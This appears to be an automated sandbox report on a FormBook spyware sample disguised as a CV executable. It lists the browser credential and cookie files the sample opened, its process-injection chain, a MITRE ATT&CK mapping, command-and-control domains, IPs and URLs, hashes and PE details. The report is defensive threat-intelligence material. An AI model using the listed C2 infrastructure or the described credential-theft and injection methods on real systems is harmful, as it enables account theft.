                Source: Yara match | File source: 00000005.00000002.4524870998.0000000000810000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.4524992945.00000000029B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.4528088179.0000000004DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2388428467.00000000032E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2388123154.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.4524586878.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2388832074.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.4526133034.0000000002290000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\winver.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\winver.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\winver.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\winver.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\winver.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\winver.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\winver.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\winver.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\winver.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
                Source: CV Lic H&S Olivetti Renzo.exe | Binary or memory string: WIN_81
                Source: CV Lic H&S Olivetti Renzo.exe | Binary or memory string: WIN_XP
                Source: CV Lic H&S Olivetti Renzo.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
                Source: CV Lic H&S Olivetti Renzo.exe | Binary or memory string: WIN_XPe
                Source: CV Lic H&S Olivetti Renzo.exe | Binary or memory string: WIN_VISTA
                Source: CV Lic H&S Olivetti Renzo.exe | Binary or memory string: WIN_7
                Source: CV Lic H&S Olivetti Renzo.exe | Binary or memory string: WIN_8

                Remote Access Functionality

                Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000005.00000002.4524870998.0000000000810000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.4524992945.00000000029B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.4528088179.0000000004DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2388428467.00000000032E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2388123154.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.4524586878.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2388832074.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.4526133034.0000000002290000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe | Code function: 0_2_00118C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe | Code function: 0_2_0011923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket
                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | 2 Valid Accounts | 3 Native API | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 1 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 5 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
                Credentials | Domains | Default Accounts | Scheduled Task/Job | 2 Valid Accounts | 1 Abuse Elevation Control Mechanism | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | 5 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 2 Valid Accounts | 3 Obfuscated Files or Information | NTDS | 116 System Information Discovery | Distributed Component Object Model | 21 Input Capture | 5 Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 21 Access Token Manipulation | 1 DLL Side-Loading | LSA Secrets | 151 Security Software Discovery | SSH | 3 Clipboard Data | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 412 Process Injection | 2 Valid Accounts | Cached Domain Credentials | 2 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 2 Virtualization/Sandbox Evasion | DCSync | 3 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 21 Access Token Manipulation | Proc Filesystem | 11 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 412 Process Injection | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                Behavior Graph (image not preserved)
                ID: 1561737
                Sample: CV Lic H&S Olivetti Renzo.exe
                Startdate: 24/11/2024
                Architecture: WINDOWS
                Score: 100

                Sample-level signatures: Suricata IDS alerts for network traffic; Multi AV Scanner detection for submitted file; Yara detected FormBook; 5 other signatures
                Sample-level DNS/IP: www.rtpterbaruwaktu3.xyz; www.fortevision.xyz (Performs DNS queries to domains with low reputation); 18 other IPs or domains

                Process chain:
                • CV Lic H&S Olivetti Renzo.exe (started): Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process
                • svchost.exe (started): Maps a DLL or memory area into another process
                • NObNfBLfyhvzeH.exe (injected): Found direct / indirect Syscall (likely to bypass EDR)
                • winver.exe (started): Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                • NObNfBLfyhvzeH.exe (injected by winver.exe): Found direct / indirect Syscall (likely to bypass EDR); DNS/IP: www.connecty.live 203.161.43.228, 50001, 50002, 50003 VNPT-AS-VNVNPTCorpVN Malaysia; bpgroup.site 74.48.143.82, 49891, 49897, 49905 TELUS-3CA Canada; 11 other IPs or domains
                • firefox.exe (started by winver.exe)

                Source | Detection | Scanner | Label | Link
                CV Lic H&S Olivetti Renzo.exe | 63% | ReversingLabs | Win32.Trojan.AutoitInject |
                CV Lic H&S Olivetti Renzo.exe | 50% | Virustotal | | Browse
                CV Lic H&S Olivetti Renzo.exe | 100% | Joe Sandbox ML | |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                                          rtpterbaruwaktu3.xyz
                                          103.21.221.87
                                          truetrue
                                            unknown
                                            www.bpgroup.site
                                            unknown
                                            unknownfalse
                                              unknown
                                              www.grandesofertas.fun
                                              unknown
                                              unknownfalse
                                                unknown
                                                www.jijievo.site
                                                unknown
                                                unknownfalse
                                                  unknown
                                                  www.rtpterbaruwaktu3.xyz
                                                  unknown
                                                  unknowntrue
                                                    unknown
                                                    www.prhmcjdz.tokyo
                                                    unknown
                                                    unknownfalse
                                                      unknown
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1561737
Start date and time: 2024-11-24 08:18:16 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 55s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: CV Lic H&S Olivetti Renzo.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/3@15/13
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 91%
• Number of executed functions: 55
• Number of non-executed functions: 288
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing disassembly code.
Time: 02:20:18
Type: API Interceptor
Description: 10003275x Sleep call for process: winver.exe modified
                                                                                          • www.tals.xyz/k1td/
                                                                                          DOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                                                          • www.aiactor.xyz/x4ne/?KV=IjUvc9W1zDiNc9PqfXKx1TS0r6LahxQTMxD+2/9txvMkLHbQHvhCPVSp7yYBhZqVsANcjuLc38irD20I6v8c1v1ytT+DEei/9odakMDFYuDWzKGl/p+Lmpo=&Wno=a0qDq
                                                                                          CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.remedies.pro/hrap/
                                                                                          SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.optimismbank.xyz/lnyv/
                                                                                          New Order - RCII900718_Contract Drafting.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.avalanchefi.xyz/ctta/
                                                                                          need quotations.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.egldfi.xyz/3e55/
                                                                                          Quotation request -30112024_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.tals.xyz/010v/
                                                                                          8.210.46.21CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.prhmcjdz.tokyo/cm9a/
                                                                                          No context
                                                                                          No context
                                                                                          Process:C:\Windows\SysWOW64\winver.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                          Category:dropped
                                                                                          Size (bytes):196608
                                                                                          Entropy (8bit):1.121297215059106
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                          MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                          SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                          SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                          SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                          Malicious:false
                                                                                          Reputation:high, very likely benign file
                                                                                          Process:C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):288256
                                                                                          Entropy (8bit):7.993957307360091
                                                                                          Encrypted:true
                                                                                          SSDEEP:6144:376OFozMzrfpHwYpRR5JIe2gs1pTDpeDs303MC4PVhfB:Ogw0lQYFIe2p1pgrMC4Nj
                                                                                          MD5:4B996FECAC02FBCDB531E19B51664774
                                                                                          SHA1:8ABB5D909B28E231611C2F18C8D8409A8174FFC1
                                                                                          SHA-256:69E0A9A7B089C5B271AF8C5FB6A0236800D952CCA15A1B9433EF12AC03AB8E9D
                                                                                          SHA-512:9E0F10B2FB5DC207AAEAA640684AE124AB396B462E457508E4E2E1E38BB17CEAF750C53C297170B495061213735CE2B905A7170DE3FD2E96EBFEF395B9ADA520
                                                                                          Malicious:false
                                                                                          Reputation:low
                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                          Entropy (8bit):7.139542083322144
                                                                                          TrID:
                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                          File name:CV Lic H&S Olivetti Renzo.exe
                                                                                          File size:1'207'296 bytes
                                                                                          MD5:12a282dc358949660691fbff8bcdf461
                                                                                          SHA1:c425cd4b512501453ec8f08f98983e5e02c6c614
                                                                                          SHA256:7ab6840afe0f8992a491db388b5225eea0ab7bad3a76be681e3344776070ce4d
                                                                                          SHA512:b1668ddd51a18a7bc6fc20ebc0ed163ed7186bb32c865e48e3fa741a9e9cb8811f2195701993ec6a4c4a7b1cc5adbddd76e81817be44752614c2608adf532b8a
                                                                                          SSDEEP:24576:0tb20pkaCqT5TBWgNQ7acBSzrMo1SJpmSpXl6A:dVg5tQ7acB4B0pLp15
                                                                                          TLSH:B545C01273DE8361C3B25273BA25B741BEBB782506B1F56B2FD4093DE920162521EB73
                                                                                          Icon Hash:aaf3e3e3938382a0
                                                                                          Entrypoint:0x425f74
                                                                                          Entrypoint Section:.text
                                                                                          Digitally signed:false
                                                                                          Imagebase:0x400000
                                                                                          Subsystem:windows gui
                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                          Time Stamp:0x673F2132 [Thu Nov 21 12:01:54 2024 UTC]
                                                                                          TLS Callbacks:
                                                                                          CLR (.Net) Version:
                                                                                          OS Version Major:5
                                                                                          OS Version Minor:1
                                                                                          File Version Major:5
                                                                                          File Version Minor:1
                                                                                          Subsystem Version Major:5
                                                                                          Subsystem Version Minor:1
                                                                                          Import Hash:3d95adbf13bbe79dc24dccb401c12091
                                                                                          Instruction
                                                                                          call 00007F6F286F41DFh
                                                                                          jmp 00007F6F286E71F4h
                                                                                          int3
                                                                                          int3
                                                                                          push edi
                                                                                          push esi
                                                                                          mov esi, dword ptr [esp+10h]
                                                                                          mov ecx, dword ptr [esp+14h]
                                                                                          mov edi, dword ptr [esp+0Ch]
                                                                                          mov eax, ecx
                                                                                          mov edx, ecx
                                                                                          add eax, esi
                                                                                          cmp edi, esi
                                                                                          jbe 00007F6F286E737Ah
                                                                                          cmp edi, eax
                                                                                          jc 00007F6F286E76DEh
                                                                                          bt dword ptr [004C0158h], 01h
                                                                                          jnc 00007F6F286E7379h
                                                                                          rep movsb
                                                                                          jmp 00007F6F286E768Ch
                                                                                          cmp ecx, 00000080h
                                                                                          jc 00007F6F286E7544h
                                                                                          mov eax, edi
                                                                                          xor eax, esi
                                                                                          test eax, 0000000Fh
                                                                                          jne 00007F6F286E7380h
                                                                                          bt dword ptr [004BA370h], 01h
                                                                                          jc 00007F6F286E7850h
                                                                                          bt dword ptr [004C0158h], 00000000h
                                                                                          jnc 00007F6F286E751Dh
                                                                                          test edi, 00000003h
                                                                                          jne 00007F6F286E752Eh
                                                                                          test esi, 00000003h
                                                                                          jne 00007F6F286E750Dh
                                                                                          bt edi, 02h
                                                                                          jnc 00007F6F286E737Fh
                                                                                          mov eax, dword ptr [esi]
                                                                                          sub ecx, 04h
                                                                                          lea esi, dword ptr [esi+04h]
                                                                                          mov dword ptr [edi], eax
                                                                                          lea edi, dword ptr [edi+04h]
                                                                                          bt edi, 03h
                                                                                          jnc 00007F6F286E7383h
                                                                                          movq xmm1, qword ptr [esi]
                                                                                          sub ecx, 08h
                                                                                          lea esi, dword ptr [esi+08h]
                                                                                          movq qword ptr [edi], xmm1
                                                                                          lea edi, dword ptr [edi+08h]
                                                                                          test esi, 00000007h
                                                                                          je 00007F6F286E73D5h
                                                                                          bt esi, 03h
                                                                                          jnc 00007F6F286E7428h
                                                                                          movdqa xmm1, dqword ptr [esi+00h]
                                                                                          Programming Language:
                                                                                          • [ C ] VS2008 SP1 build 30729
                                                                                          • [IMP] VS2008 SP1 build 30729
                                                                                          • [ASM] VS2012 UPD4 build 61030
                                                                                          • [RES] VS2012 UPD4 build 61030
                                                                                          • [LNK] VS2012 UPD4 build 61030
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb7004 | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc4000 | 0x5db24 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x122000 | 0x6c4c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x8d8d0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb2730 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8d000 | 0x860 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8b54f | 0x8b600 | f437a6545e938612764dbb0a314376fc | False | 0.5699499019058296 | data | 6.680413749210956 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8d000 | 0x2cc42 | 0x2ce00 | 827ffd24759e8e420890ecf164be989e | False | 0.330464397632312 | data | 5.770192333189168 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xba000 | 0x9d54 | 0x6200 | e0a519f8e3a35fae0d9c2cfd5a4bacfc | False | 0.16402264030612246 | data | 2.002691099965349 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc4000 | 0x5db24 | 0x5dc00 | b42ddced81cbc35622ebce6ed3e599c2 | False | 0.9300364583333334 | data | 7.898955142760988 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x122000 | 0xa474 | 0xa600 | 0bc98f8631ef0bde830a7f83bb06ff08 | False | 0.5017884036144579 | data | 5.245426654116355 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc45a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xc46d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xc47f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xc4920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xc4c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xc4d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xc5bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xc6480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xc69e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xc8f90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xca038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xca4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xca4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xcaa84 | 0x68a | data | English | Great Britain | 0.2747909199522103
RT_STRING | 0xcb110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xcb5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xcbb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xcc1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xcc660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xcc7b8 | 0x54e2b | data | | | 1.0003336295733856
RT_GROUP_ICON | 0x1215e4 | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x12165c | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x121670 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x121684 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x121698 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x121774 | 0x3b0 | ASCII text, with CRLF line terminators | English | Great Britain | 0.5116525423728814
DLL | Import
WSOCK32.dll | __WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
VERSION.dll | GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll | InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll | UnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll | IsThemeActive
KERNEL32.dll | HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
